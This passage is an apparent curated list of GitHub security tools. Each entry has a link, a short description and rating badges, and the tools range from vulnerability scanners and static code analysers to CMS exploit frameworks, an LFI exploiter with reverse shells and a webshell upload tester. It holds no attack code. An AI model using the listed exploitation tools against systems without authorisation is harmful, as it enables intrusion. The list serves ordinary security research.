- https://github.com/CHYbeta/cmsPoc - **CMS exploit framework**
> ![](https://img.shields.io/badge/Score-%E2%98%85%E2%98%85%E2%98%85%E2%98%85-yellow?style=flat-square) ![](https://img.shields.io/badge/MainLanguage-Python-blue?style=flat-square) ![GitHub language count](https://img.shields.io/github/languages/count/CHYbeta/cmsPoc?style=flat-square) ![GitHub last commit](https://img.shields.io/github/last-commit/CHYbeta/cmsPoc?style=flat-square) ![GitHub stars](https://img.shields.io/github/stars/CHYbeta/cmsPoc?style=flat-square) ![GitHub](https://img.shields.io/github/license/CHYbeta/cmsPoc?style=flat-square)
- https://github.com/3gstudent/Smbtouch-Scanner - **Automatically scan the inner network to detect whether they are vulnerable**
> ![](https://img.shields.io/badge/Score-%E2%98%85%E2%98%85%E2%98%85-yellow?style=flat-square) ![](https://img.shields.io/badge/MainLanguage-Python-blue?style=flat-square) ![GitHub language count](https://img.shields.io/github/languages/count/3gstudent/Smbtouch-Scanner?style=flat-square) ![GitHub last commit](https://img.shields.io/github/last-commit/3gstudent/Smbtouch-Scanner?style=flat-square) ![GitHub stars](https://img.shields.io/github/stars/3gstudent/Smbtouch-Scanner?style=flat-square) ![GitHub](https://img.shields.io/github/license/3gstudent/Smbtouch-Scanner?style=flat-square)
- https://github.com/OsandaMalith/LFiFreak - **A unique automated LFI exploiter with bind/reverse shells**
> ![](https://img.shields.io/badge/Score-%E2%98%85%E2%98%85%E2%98%85-yellow?style=flat-square) ![](https://img.shields.io/badge/MainLanguage-Python-blue?style=flat-square) ![GitHub language count](https://img.shields.io/github/languages/count/OsandaMalith/LFiFreak?style=flat-square) ![GitHub last commit](https://img.shields.io/github/last-commit/OsandaMalith/LFiFreak?style=flat-square) ![GitHub stars](https://img.shields.io/github/stars/OsandaMalith/LFiFreak?style=flat-square) ![GitHub](https://img.shields.io/github/license/OsandaMalith/LFiFreak?style=flat-square)
- https://github.com/mak-/parameth - **This tool can be used to brute discover GET and POST parameters**
> ![](https://img.shields.io/badge/Score-%E2%98%85%E2%98%85%E2%98%85-yellow?style=flat-square) ![](https://img.shields.io/badge/MainLanguage-Python-blue?style=flat-square) ![GitHub language count](https://img.shields.io/github/languages/count/mak-/parameth?style=flat-square) ![GitHub last commit](https://img.shields.io/github/last-commit/mak-/parameth?style=flat-square) ![GitHub stars](https://img.shields.io/github/stars/mak-/parameth?style=flat-square) ![GitHub](https://img.shields.io/github/license/mak-/parameth?style=flat-square)
- https://github.com/Lucifer1993/struts-scan - **Struts2 vuls scanner,supported all vuls**
> ![](https://img.shields.io/badge/Score-%E2%98%85%E2%98%85%E2%98%85%E2%98%85%E2%98%85-yellow?style=flat-square) ![](https://img.shields.io/badge/MainLanguage-Python-blue?style=flat-square) ![GitHub language count](https://img.shields.io/github/languages/count/Lucifer1993/struts-scan?style=flat-square) ![GitHub last commit](https://img.shields.io/github/last-commit/Lucifer1993/struts-scan?style=flat-square) ![GitHub stars](https://img.shields.io/github/stars/Lucifer1993/struts-scan?style=flat-square) ![GitHub](https://img.shields.io/github/license/Lucifer1993/struts-scan?style=flat-square)
- https://github.com/hahwul/a2sv - **Auto scanning to SSL vulnerability, such as heartbleed etc**
> ![](https://img.shields.io/badge/Score-%E2%98%85%E2%98%85%E2%98%85%E2%98%85-yellow?style=flat-square) ![](https://img.shields.io/badge/MainLanguage-Python-blue?style=flat-square) ![GitHub language count](https://img.shields.io/github/languages/count/hahwul/a2sv?style=flat-square) ![GitHub last commit](https://img.shields.io/github/last-commit/hahwul/a2sv?style=flat-square) ![GitHub stars](https://img.shields.io/github/stars/hahwul/a2sv?style=flat-square) ![GitHub](https://img.shields.io/github/license/hahwul/a2sv?style=flat-square)
- https://github.com/NickstaDB/BaRMIe - **Java RMI enumeration and attack tool**
> ![](https://img.shields.io/badge/Score-%E2%98%85%E2%98%85%E2%98%85-yellow?style=flat-square) ![](https://img.shields.io/badge/MainLanguage-Java-blue?style=flat-square) ![GitHub language count](https://img.shields.io/github/languages/count/NickstaDB/BaRMIe?style=flat-square) ![GitHub last commit](https://img.shields.io/github/last-commit/NickstaDB/BaRMIe?style=flat-square) ![GitHub stars](https://img.shields.io/github/stars/NickstaDB/BaRMIe?style=flat-square) ![GitHub](https://img.shields.io/github/license/NickstaDB/BaRMIe?style=flat-square)
- https://github.com/RetireJS/grunt-retire - **Scanner detecting the use of Javascript libraries with known vulnerabilities**
> ![](https://img.shields.io/badge/Score-%E2%98%85%E2%98%85%E2%98%85%E2%98%85-yellow?style=flat-square) ![](https://img.shields.io/badge/MainLanguage-Python-blue?style=flat-square) ![GitHub language count](https://img.shields.io/github/languages/count/RetireJS/grunt-retire?style=flat-square) ![GitHub last commit](https://img.shields.io/github/last-commit/RetireJS/grunt-retire?style=flat-square) ![GitHub stars](https://img.shields.io/github/stars/RetireJS/grunt-retire?style=flat-square) ![GitHub](https://img.shields.io/github/license/RetireJS/grunt-retire?style=flat-square)
- https://github.com/kotobukki/BDA - **The vulnerability detector for Hadoop and Spark**
> ![](https://img.shields.io/badge/Score-%E2%98%85%E2%98%85%E2%98%85%E2%98%85-yellow?style=flat-square) ![](https://img.shields.io/badge/MainLanguage-Python-blue?style=flat-square) ![GitHub language count](https://img.shields.io/github/languages/count/kotobukki/BDA?style=flat-square) ![GitHub last commit](https://img.shields.io/github/last-commit/kotobukki/BDA?style=flat-square) ![GitHub stars](https://img.shields.io/github/stars/kotobukki/BDA?style=flat-square) ![GitHub](https://img.shields.io/github/license/kotobukki/BDA?style=flat-square)
- https://github.com/jagracey/Regex-DoS - **RegEx Denial of service scanner for Node.js package**
> ![](https://img.shields.io/badge/Score-%E2%98%85%E2%98%85%E2%98%85%E2%98%85-yellow?style=flat-square) ![](https://img.shields.io/badge/MainLanguage-Node.js-blue?style=flat-square) ![GitHub language count](https://img.shields.io/github/languages/count/jagracey/Regex-DoS?style=flat-square) ![GitHub last commit](https://img.shields.io/github/last-commit/jagracey/Regex-DoS?style=flat-square) ![GitHub stars](https://img.shields.io/github/stars/jagracey/Regex-DoS?style=flat-square) ![GitHub](https://img.shields.io/github/license/jagracey/Regex-DoS?style=flat-square)
- https://github.com/milesrichardson/docker-onion-nmap - **Scan .onion hidden services with nmap using Tor, proxychains and dnsmasq**
> ![](https://img.shields.io/badge/Score-%E2%98%85%E2%98%85%E2%98%85%E2%98%85-yellow?style=flat-square) ![](https://img.shields.io/badge/MainLanguage-Bash-blue?style=flat-square) ![GitHub language count](https://img.shields.io/github/languages/count/milesrichardson/docker-onion-nmap?style=flat-square) ![GitHub last commit](https://img.shields.io/github/last-commit/milesrichardson/docker-onion-nmap?style=flat-square) ![GitHub stars](https://img.shields.io/github/stars/milesrichardson/docker-onion-nmap?style=flat-square) ![GitHub](https://img.shields.io/github/license/milesrichardson/docker-onion-nmap?style=flat-square)
- https://github.com/Moham3dRiahi/XAttacker - **Web CMS exploit framework**
> ![](https://img.shields.io/badge/Score-%E2%98%85%E2%98%85%E2%98%85%E2%98%85%E2%98%85-yellow?style=flat-square) ![](https://img.shields.io/badge/MainLanguage-Perl-blue?style=flat-square) ![GitHub language count](https://img.shields.io/github/languages/count/Moham3dRiahi/XAttacker?style=flat-square) ![GitHub last commit](https://img.shields.io/github/last-commit/Moham3dRiahi/XAttacker?style=flat-square) ![GitHub stars](https://img.shields.io/github/stars/Moham3dRiahi/XAttacker?style=flat-square) ![GitHub](https://img.shields.io/github/license/Moham3dRiahi/XAttacker?style=flat-square)
- https://github.com/lijiejie/BBScan - **A tiny batch web vulnerability scanner**
> ![](https://img.shields.io/badge/Score-%E2%98%85%E2%98%85%E2%98%85%E2%98%85-yellow?style=flat-square) ![](https://img.shields.io/badge/MainLanguage-Python-blue?style=flat-square) ![GitHub language count](https://img.shields.io/github/languages/count/lijiejie/BBScan?style=flat-square) ![GitHub last commit](https://img.shields.io/github/last-commit/lijiejie/BBScan?style=flat-square) ![GitHub stars](https://img.shields.io/github/stars/lijiejie/BBScan?style=flat-square) ![GitHub](https://img.shields.io/github/license/lijiejie/BBScan?style=flat-square)
- https://github.com/almandin/fuxploider - **File upload vulnerability scanner and exploitation tool**
> ![](https://img.shields.io/badge/Score-%E2%98%85%E2%98%85%E2%98%85%E2%98%85-yellow?style=flat-square) ![](https://img.shields.io/badge/MainLanguage-Python-blue?style=flat-square) ![GitHub language count](https://img.shields.io/github/languages/count/almandin/fuxploider?style=flat-square) ![GitHub last commit](https://img.shields.io/github/last-commit/almandin/fuxploider?style=flat-square) ![GitHub stars](https://img.shields.io/github/stars/almandin/fuxploider?style=flat-square) ![GitHub](https://img.shields.io/github/license/almandin/fuxploider?style=flat-square)
- https://github.com/Jamalc0m/wphunter - **A Wordpress vulnerability scanner**
> ![](https://img.shields.io/badge/Score-%E2%98%85%E2%98%85-yellow?style=flat-square) ![](https://img.shields.io/badge/MainLanguage-PHP-blue?style=flat-square) ![GitHub language count](https://img.shields.io/github/languages/count/Jamalc0m/wphunter?style=flat-square) ![GitHub last commit](https://img.shields.io/github/last-commit/Jamalc0m/wphunter?style=flat-square) ![GitHub stars](https://img.shields.io/github/stars/Jamalc0m/wphunter?style=flat-square) ![GitHub](https://img.shields.io/github/license/Jamalc0m/wphunter?style=flat-square)
- https://github.com/retirejs/retire.js - **A scanner detecting the use of Javascript libraries with known vulnerabilities**
> ![](https://img.shields.io/badge/Score-%E2%98%85%E2%98%85%E2%98%85%E2%98%85-yellow?style=flat-square) ![](https://img.shields.io/badge/MainLanguage-Node.js-blue?style=flat-square) ![GitHub language count](https://img.shields.io/github/languages/count/retirejs/retire.js?style=flat-square) ![GitHub last commit](https://img.shields.io/github/last-commit/retirejs/retire.js?style=flat-square) ![GitHub stars](https://img.shields.io/github/stars/retirejs/retire.js?style=flat-square) ![GitHub](https://img.shields.io/github/license/retirejs/retire.js?style=flat-square)
- https://github.com/3xp10it/xupload - **A tool for automatically testing whether the upload function can upload webshell**
> ![](https://img.shields.io/badge/Score-%E2%98%85%E2%98%85-yellow?style=flat-square) ![](https://img.shields.io/badge/MainLanguage-Python-blue?style=flat-square) ![GitHub language count](https://img.shields.io/github/languages/count/3xp10it/xupload?style=flat-square) ![GitHub last commit](https://img.shields.io/github/last-commit/3xp10it/xupload?style=flat-square) ![GitHub stars](https://img.shields.io/github/stars/3xp10it/xupload?style=flat-square) ![GitHub](https://img.shields.io/github/license/3xp10it/xupload?style=flat-square)
- https://github.com/rezasp/vbscan - **OWASP VBScan is a Black Box vBulletin vulnerability scanner**
> ![](https://img.shields.io/badge/Score-%E2%98%85%E2%98%85%E2%98%85%E2%98%85%E2%98%85-yellow?style=flat-square) ![](https://img.shields.io/badge/MainLanguage-Perl-blue?style=flat-square) ![GitHub language count](https://img.shields.io/github/languages/count/rezasp/vbscan?style=flat-square) ![GitHub last commit](https://img.shields.io/github/last-commit/rezasp/vbscan?style=flat-square) ![GitHub stars](https://img.shields.io/github/stars/rezasp/vbscan?style=flat-square) ![GitHub](https://img.shields.io/github/license/rezasp/vbscan?style=flat-square)
- https://github.com/MrSqar-Ye/BadMod - **Detect websites CMS & auto exploit**
> ![](https://img.shields.io/badge/Score-%E2%98%85%E2%98%85%E2%98%85-yellow?style=flat-square) ![](https://img.shields.io/badge/MainLanguage-PHP-blue?style=flat-square) ![GitHub language count](https://img.shields.io/github/languages/count/MrSqar-Ye/BadMod?style=flat-square) ![GitHub last commit](https://img.shields.io/github/last-commit/MrSqar-Ye/BadMod?style=flat-square) ![GitHub stars](https://img.shields.io/github/stars/MrSqar-Ye/BadMod?style=flat-square) ![GitHub](https://img.shields.io/github/license/MrSqar-Ye/BadMod?style=flat-square)
- https://github.com/Tuhinshubhra/CMSeeK - **CMS detection and exploitation suite**
> ![](https://img.shields.io/badge/Score-%E2%98%85%E2%98%85%E2%98%85%E2%98%85%E2%98%85-yellow?style=flat-square) ![](https://img.shields.io/badge/MainLanguage-Python-blue?style=flat-square) ![GitHub language count](https://img.shields.io/github/languages/count/Tuhinshubhra/CMSeeK?style=flat-square) ![GitHub last commit](https://img.shields.io/github/last-commit/Tuhinshubhra/CMSeeK?style=flat-square) ![GitHub stars](https://img.shields.io/github/stars/Tuhinshubhra/CMSeeK?style=flat-square) ![GitHub](https://img.shields.io/github/license/Tuhinshubhra/CMSeeK?style=flat-square)
- https://github.com/cloudsploit/scans - **AWS security scanning checks**
> ![](https://img.shields.io/badge/Score-%E2%98%85%E2%98%85%E2%98%85%E2%98%85-yellow?style=flat-square) ![](https://img.shields.io/badge/MainLanguage-Node.js-blue?style=flat-square) ![GitHub language count](https://img.shields.io/github/languages/count/cloudsploit/scans?style=flat-square) ![GitHub last commit](https://img.shields.io/github/last-commit/cloudsploit/scans?style=flat-square) ![GitHub stars](https://img.shields.io/github/stars/cloudsploit/scans?style=flat-square) ![GitHub](https://img.shields.io/github/license/cloudsploit/scans?style=flat-square)
- https://github.com/radenvodka/SVScanner - **Scanner vulnerability and massive exploit for Wordpress,Magento,Joomla and so on**
> ![](https://img.shields.io/badge/Score-%E2%98%85%E2%98%85%E2%98%85-yellow?style=flat-square) ![](https://img.shields.io/badge/MainLanguage-Perl-blue?style=flat-square) ![GitHub language count](https://img.shields.io/github/languages/count/radenvodka/SVScanner?style=flat-square) ![GitHub last commit](https://img.shields.io/github/last-commit/radenvodka/SVScanner?style=flat-square) ![GitHub stars](https://img.shields.io/github/stars/radenvodka/SVScanner?style=flat-square) ![GitHub](https://img.shields.io/github/license/radenvodka/SVScanner?style=flat-square)
- https://github.com/rezasp/joomscan - **OWASP Joomla vulnerability scanner project**
> ![](https://img.shields.io/badge/Score-%E2%98%85%E2%98%85%E2%98%85%E2%98%85%E2%98%85-yellow?style=flat-square) ![](https://img.shields.io/badge/MainLanguage-Perl-blue?style=flat-square) ![GitHub language count](https://img.shields.io/github/languages/count/rezasp/joomscan?style=flat-square) ![GitHub last commit](https://img.shields.io/github/last-commit/rezasp/joomscan?style=flat-square) ![GitHub stars](https://img.shields.io/github/stars/rezasp/joomscan?style=flat-square) ![GitHub](https://img.shields.io/github/license/rezasp/joomscan?style=flat-square)
- https://github.com/6IX7ine/djangohunter - **Tool designed to help identify incorrectly configured Django applications that are exposing sensitive information**
> ![](https://img.shields.io/badge/Score-%E2%98%85%E2%98%85%E2%98%85-yellow?style=flat-square) ![](https://img.shields.io/badge/MainLanguage-Python-blue?style=flat-square) ![GitHub language count](https://img.shields.io/github/languages/count/6IX7ine/djangohunter?style=flat-square) ![GitHub last commit](https://img.shields.io/github/last-commit/6IX7ine/djangohunter?style=flat-square) ![GitHub stars](https://img.shields.io/github/stars/6IX7ine/djangohunter?style=flat-square) ![GitHub](https://img.shields.io/github/license/6IX7ine/djangohunter?style=flat-square)
- https://github.com/vulmon/Vulmap - **Local vulnerability scanning programs for Windows and Linux operating systems**
> ![](https://img.shields.io/badge/Score-%E2%98%85%E2%98%85%E2%98%85%E2%98%85-yellow?style=flat-square) ![](https://img.shields.io/badge/MainLanguage-PowerShell-blue?style=flat-square) ![GitHub language count](https://img.shields.io/github/languages/count/vulmon/Vulmap?style=flat-square) ![GitHub last commit](https://img.shields.io/github/last-commit/vulmon/Vulmap?style=flat-square) ![GitHub stars](https://img.shields.io/github/stars/vulmon/Vulmap?style=flat-square) ![GitHub](https://img.shields.io/github/license/vulmon/Vulmap?style=flat-square)
- https://github.com/seungsoo-lee/DELTA - **Sdn security evaluation framework**
> ![](https://img.shields.io/badge/Score-%E2%98%85%E2%98%85%E2%98%85%E2%98%85-yellow?style=flat-square) ![](https://img.shields.io/badge/MainLanguage-Java-blue?style=flat-square) ![GitHub language count](https://img.shields.io/github/languages/count/seungsoo-lee/DELTA?style=flat-square) ![GitHub last commit](https://img.shields.io/github/last-commit/seungsoo-lee/DELTA?style=flat-square) ![GitHub stars](https://img.shields.io/github/stars/seungsoo-lee/DELTA?style=flat-square) ![GitHub](https://img.shields.io/github/license/seungsoo-lee/DELTA?style=flat-square)
- https://github.com/anouarbensaad/vulnx - **Intelligent Bot, Shell can achieve automatic injection, and help researchers detect security vulnerabilities CMS system**
> ![](https://img.shields.io/badge/Score-%E2%98%85%E2%98%85%E2%98%85%E2%98%85%E2%98%85-yellow?style=flat-square) ![](https://img.shields.io/badge/MainLanguage-Python-blue?style=flat-square) ![GitHub language count](https://img.shields.io/github/languages/count/anouarbensaad/vulnx?style=flat-square) ![GitHub last commit](https://img.shields.io/github/last-commit/anouarbensaad/vulnx?style=flat-square) ![GitHub stars](https://img.shields.io/github/stars/anouarbensaad/vulnx?style=flat-square) ![GitHub](https://img.shields.io/github/license/anouarbensaad/vulnx?style=flat-square)
- https://github.com/MrEmpy/Mantra - **A tool used to hunt down API key leaks in JS files and pages**
> ![](https://img.shields.io/badge/Score-%E2%98%85%E2%98%85%E2%98%85-yellow?style=flat-square) ![](https://img.shields.io/badge/MainLanguage-Go-blue?style=flat-square) ![GitHub language count](https://img.shields.io/github/languages/count/MrEmpy/Mantra?style=flat-square) ![GitHub last commit](https://img.shields.io/github/last-commit/MrEmpy/Mantra?style=flat-square) ![GitHub stars](https://img.shields.io/github/stars/MrEmpy/Mantra?style=flat-square) ![GitHub](https://img.shields.io/github/license/MrEmpy/Mantra?style=flat-square)
### Dynamic or Static Code Analysis
- https://github.com/wufeifei/cobra - **A static code analysis system that automates the detecting vulnerabilities and security issue**
> ![](https://img.shields.io/badge/Score-%E2%98%85%E2%98%85%E2%98%85%E2%98%85%E2%98%85-yellow?style=flat-square) ![](https://img.shields.io/badge/MainLanguage-Python-blue?style=flat-square) ![GitHub language count](https://img.shields.io/github/languages/count/wufeifei/cobra?style=flat-square) ![GitHub last commit](https://img.shields.io/github/last-commit/wufeifei/cobra?style=flat-square) ![GitHub stars](https://img.shields.io/github/stars/wufeifei/cobra?style=flat-square) ![GitHub](https://img.shields.io/github/license/wufeifei/cobra?style=flat-square)
- https://github.com/OneSourceCat/phpvulhunter - **A tool that can scan php vulnerabilities automatically using static analysis methods**
> ![](https://img.shields.io/badge/Score-%E2%98%85%E2%98%85-yellow?style=flat-square) ![](https://img.shields.io/badge/MainLanguage-PHP-blue?style=flat-square) ![GitHub language count](https://img.shields.io/github/languages/count/OneSourceCat/phpvulhunter?style=flat-square) ![GitHub last commit](https://img.shields.io/github/last-commit/OneSourceCat/phpvulhunter?style=flat-square) ![GitHub stars](https://img.shields.io/github/stars/OneSourceCat/phpvulhunter?style=flat-square) ![GitHub](https://img.shields.io/github/license/OneSourceCat/phpvulhunter?style=flat-square)
- https://github.com/Qihoo360/phptrace - **A tracing and troubleshooting tool for PHP scripts**
> ![](https://img.shields.io/badge/Score-%E2%98%85%E2%98%85%E2%98%85%E2%98%85-yellow?style=flat-square) ![](https://img.shields.io/badge/MainLanguage-Python-blue?style=flat-square) ![GitHub language count](https://img.shields.io/github/languages/count/Qihoo360/phptrace?style=flat-square) ![GitHub last commit](https://img.shields.io/github/last-commit/Qihoo360/phptrace?style=flat-square) ![GitHub stars](https://img.shields.io/github/stars/Qihoo360/phptrace?style=flat-square) ![GitHub](https://img.shields.io/github/license/Qihoo360/phptrace?style=flat-square)
- https://github.com/ajinabraham/NodeJsScan - **A static security code scanner for Node.js applications**
> ![](https://img.shields.io/badge/Score-%E2%98%85%E2%98%85%E2%98%85-yellow?style=flat-square) ![](https://img.shields.io/badge/MainLanguage-Python-blue?style=flat-square) ![GitHub language count](https://img.shields.io/github/languages/count/ajinabraham/NodeJsScan?style=flat-square) ![GitHub last commit](https://img.shields.io/github/last-commit/ajinabraham/NodeJsScan?style=flat-square) ![GitHub stars](https://img.shields.io/github/stars/ajinabraham/NodeJsScan?style=flat-square) ![GitHub](https://img.shields.io/github/license/ajinabraham/NodeJsScan?style=flat-square)
- https://github.com/shengqi158/pyvulhunter - **A static security code scanner for Python applications**
> ![](https://img.shields.io/badge/Score-%E2%98%85%E2%98%85-yellow?style=flat-square) ![](https://img.shields.io/badge/MainLanguage-Python-blue?style=flat-square) ![GitHub language count](https://img.shields.io/github/languages/count/shengqi158/pyvulhunter?style=flat-square) ![GitHub last commit](https://img.shields.io/github/last-commit/shengqi158/pyvulhunter?style=flat-square) ![GitHub stars](https://img.shields.io/github/stars/shengqi158/pyvulhunter?style=flat-square) ![GitHub](https://img.shields.io/github/license/shengqi158/pyvulhunter?style=flat-square)
- https://github.com/python-security/pyt - **A static analysis tool for detecting security vulnerabilities in Python web applications**
> ![](https://img.shields.io/badge/Score-%E2%98%85%E2%98%85%E2%98%85-yellow?style=flat-square) ![](https://img.shields.io/badge/MainLanguage-Python-blue?style=flat-square) ![GitHub language count](https://img.shields.io/github/languages/count/python-security/pyt?style=flat-square) ![GitHub last commit](https://img.shields.io/github/last-commit/python-security/pyt?style=flat-square) ![GitHub stars](https://img.shields.io/github/stars/python-security/pyt?style=flat-square) ![GitHub](https://img.shields.io/github/license/python-security/pyt?style=flat-square)
- https://github.com/emanuil/php-reaper - **PHP tool to scan ADOdb code for SQL injections**
> ![](https://img.shields.io/badge/Score-%E2%98%85%E2%98%85%E2%98%85-yellow?style=flat-square) ![](https://img.shields.io/badge/MainLanguage-PHP-blue?style=flat-square) ![GitHub language count](https://img.shields.io/github/languages/count/emanuil/php-reaper?style=flat-square) ![GitHub last commit](https://img.shields.io/github/last-commit/emanuil/php-reaper?style=flat-square) ![GitHub stars](https://img.shields.io/github/stars/emanuil/php-reaper?style=flat-square) ![GitHub](https://img.shields.io/github/license/emanuil/php-reaper?style=flat-square)
- https://github.com/lowjoel/phortress - **A PHP static code analyser for potential vulnerabilities**
> ![](https://img.shields.io/badge/Score-%E2%98%85%E2%98%85-yellow?style=flat-square) ![](https://img.shields.io/badge/MainLanguage-PHP-blue?style=flat-square) ![GitHub language count](https://img.shields.io/github/languages/count/lowjoel/phortress?style=flat-square) ![GitHub last commit](https://img.shields.io/github/last-commit/lowjoel/phortress?style=flat-square) ![GitHub stars](https://img.shields.io/github/stars/lowjoel/phortress?style=flat-square) ![GitHub](https://img.shields.io/github/license/lowjoel/phortress?style=flat-square)
- https://github.com/zsdlove/Hades - **A Java static code auditing system**
> ![](https://img.shields.io/badge/Score-%E2%98%85%E2%98%85%E2%98%85%E2%98%85%E2%98%85-yellow?style=flat-square) ![](https://img.shields.io/badge/MainLanguage-Python-blue?style=flat-square) ![GitHub language count](https://img.shields.io/github/languages/count/zsdlove/Hades?style=flat-square) ![GitHub last commit](https://img.shields.io/github/last-commit/zsdlove/Hades?style=flat-square) ![GitHub stars](https://img.shields.io/github/stars/zsdlove/Hades?style=flat-square) ![GitHub](https://img.shields.io/github/license/zsdlove/Hades?style=flat-square)
- https://github.com/LoRexxar/Kunlun-M - **Static code auditing system for PHP/JavaScript/Chrome EXT**
> ![](https://img.shields.io/badge/Score-%E2%98%85%E2%98%85%E2%98%85%E2%98%85%E2%98%85-yellow?style=flat-square) ![](https://img.shields.io/badge/MainLanguage-Python-blue?style=flat-square) ![GitHub language count](https://img.shields.io/github/languages/count/LoRexxar/Kunlun-M?style=flat-square) ![GitHub last commit](https://img.shields.io/github/last-commit/LoRexxar/Kunlun-M?style=flat-square) ![GitHub stars](https://img.shields.io/github/stars/LoRexxar/Kunlun-M?style=flat-square) ![GitHub](https://img.shields.io/github/license/LoRexxar/Kunlun-M?style=flat-square)
- https://github.com/PyCQA/bandit - **A tool designed to find common security issues in Python code**
> ![](https://img.shields.io/badge/Score-%E2%98%85%E2%98%85%E2%98%85%E2%98%85%E2%98%85-yellow?style=flat-square) ![](https://img.shields.io/badge/MainLanguage-Python-blue?style=flat-square) ![GitHub language count](https://img.shields.io/github/languages/count/PyCQA/bandit?style=flat-square) ![GitHub last commit](https://img.shields.io/github/last-commit/PyCQA/bandit?style=flat-square) ![GitHub stars](https://img.shields.io/github/stars/PyCQA/bandit?style=flat-square) ![GitHub](https://img.shields.io/github/license/PyCQA/bandit?style=flat-square)
- https://github.com/praetorian-inc/gokart - **A static analysis tool for securing Go code**
> ![](https://img.shields.io/badge/Score-%E2%98%85%E2%98%85%E2%98%85%E2%98%85%E2%98%85-yellow?style=flat-square) ![](https://img.shields.io/badge/MainLanguage-Go-blue?style=flat-square) ![GitHub language count](https://img.shields.io/github/languages/count/praetorian-inc/gokart?style=flat-square) ![GitHub last commit](https://img.shields.io/github/last-commit/praetorian-inc/gokart?style=flat-square) ![GitHub stars](https://img.shields.io/github/stars/praetorian-inc/gokart?style=flat-square) ![GitHub](https://img.shields.io/github/license/praetorian-inc/gokart?style=flat-square)
- https://github.com/wh1t3p1g/tabby - **A static analysis tool for Java**
> ![](https://img.shields.io/badge/Score-%E2%98%85%E2%98%85%E2%98%85%E2%98%85%E2%98%85-yellow?style=flat-square) ![](https://img.shields.io/badge/MainLanguage-Java-blue?style=flat-square) ![GitHub language count](https://img.shields.io/github/languages/count/wh1t3p1g/tabby?style=flat-square) ![GitHub last commit](https://img.shields.io/github/last-commit/wh1t3p1g/tabby?style=flat-square) ![GitHub stars](https://img.shields.io/github/stars/wh1t3p1g/tabby?style=flat-square) ![GitHub](https://img.shields.io/github/license/wh1t3p1g/tabby?style=flat-square)
- https://github.com/CoolerVoid/codecat - **The tool to help you find/track user input sinks and security bugs in Java, C++,GO, Python, javascript, Swift etc. with regex rules**
> ![](https://img.shields.io/badge/Score-%E2%98%85%E2%98%85%E2%98%85%E2%98%85%E2%98%85-yellow?style=flat-square) ![](https://img.shields.io/badge/MainLanguage-Python-blue?style=flat-square) ![GitHub language count](https://img.shields.io/github/languages/count/CoolerVoid/codecat?style=flat-square) ![GitHub last commit](https://img.shields.io/github/last-commit/CoolerVoid/codecat?style=flat-square) ![GitHub stars](https://img.shields.io/github/stars/CoolerVoid/codecat?style=flat-square) ![GitHub](https://img.shields.io/github/license/CoolerVoid/codecat?style=flat-square)
- https://github.com/qax-os/goreporter - **A Golang tool that does static analysis, unit testing, code review and generate code quality report**
> ![](https://img.shields.io/badge/Score-%E2%98%85%E2%98%85%E2%98%85%E2%98%85%E2%98%85-yellow?style=flat-square) ![](https://img.shields.io/badge/MainLanguage-Go-blue?style=flat-square) ![GitHub language count](https://img.shields.io/github/languages/count/qax-os/goreporter?style=flat-square) ![GitHub last commit](https://img.shields.io/github/last-commit/qax-os/goreporter?style=flat-square) ![GitHub stars](https://img.shields.io/github/stars/qax-os/goreporter?style=flat-square) ![GitHub](https://img.shields.io/github/license/qax-os/goreporter?style=flat-square)
- https://github.com/hudangwei/codemillx - **CodeQL tool for Go programs**
> ![](https://img.shields.io/badge/Score-%E2%98%85%E2%98%85%E2%98%85%E2%98%85-yellow?style=flat-square) ![](https://img.shields.io/badge/MainLanguage-Go-blue?style=flat-square) ![GitHub language count](https://img.shields.io/github/languages/count/hudangwei/codemillx?style=flat-square) ![GitHub last commit](https://img.shields.io/github/last-commit/hudangwei/codemillx?style=flat-square) ![GitHub stars](https://img.shields.io/github/stars/hudangwei/codemillx?style=flat-square) ![GitHub](https://img.shields.io/github/license/hudangwei/codemillx?style=flat-square)
- https://github.com/securego/gosec - **Inspects source code for security problems by scanning the Go AST**
> ![](https://img.shields.io/badge/Score-%E2%98%85%E2%98%85%E2%98%85%E2%98%85%E2%98%85-yellow?style=flat-square) ![](https://img.shields.io/badge/MainLanguage-Go-blue?style=flat-square) ![GitHub language count](https://img.shields.io/github/languages/count/securego/gosec?style=flat-square) ![GitHub last commit](https://img.shields.io/github/last-commit/securego/gosec?style=flat-square) ![GitHub stars](https://img.shields.io/github/stars/securego/gosec?style=flat-square) ![GitHub](https://img.shields.io/github/license/securego/gosec?style=flat-square)
### Modular Design Scanners or Vulnerability Detecting Framework
- https://github.com/infobyte/faraday - **Collaborative penetration test and vulnerability management platform**
> ![](https://img.shields.io/badge/Score-%E2%98%85%E2%98%85%E2%98%85%E2%98%85%E2%98%85-yellow?style=flat-square) ![](https://img.shields.io/badge/MainLanguage-Python-blue?style=flat-square) ![GitHub language count](https://img.shields.io/github/languages/count/infobyte/faraday?style=flat-square) ![GitHub last commit](https://img.shields.io/github/last-commit/infobyte/faraday?style=flat-square) ![GitHub stars](https://img.shields.io/github/stars/infobyte/faraday?style=flat-square) ![GitHub](https://img.shields.io/github/license/infobyte/faraday?style=flat-square)
- https://github.com/az0ne/AZScanner - **Automatic all-around scanner**
> ![](https://img.shields.io/badge/Score-%E2%98%85%E2%98%85%E2%98%85-yellow?style=flat-square) ![](https://img.shields.io/badge/MainLanguage-Python-blue?style=flat-square) ![GitHub language count](https://img.shields.io/github/languages/count/az0ne/AZScanner?style=flat-square) ![GitHub last commit](https://img.shields.io/github/last-commit/az0ne/AZScanner?style=flat-square) ![GitHub stars](https://img.shields.io/github/stars/az0ne/AZScanner?style=flat-square) ![GitHub](https://img.shields.io/github/license/az0ne/AZScanner?style=flat-square)
- https://github.com/blackye/lalascan - **Distributed web vulnerability scanning framework**
> ![](https://img.shields.io/badge/Score-%E2%98%85%E2%98%85%E2%98%85-yellow?style=flat-square) ![](https://img.shields.io/badge/MainLanguage-Python-blue?style=flat-square) ![GitHub language count](https://img.shields.io/github/languages/count/blackye/lalascan?style=flat-square) ![GitHub last commit](https://img.shields.io/github/last-commit/blackye/lalascan?style=flat-square) ![GitHub stars](https://img.shields.io/github/stars/blackye/lalascan?style=flat-square) ![GitHub](https://img.shields.io/github/license/blackye/lalascan?style=flat-square)
- https://github.com/blackye/BkScanner - **Distributed, plug-in web vulnerability scanner**
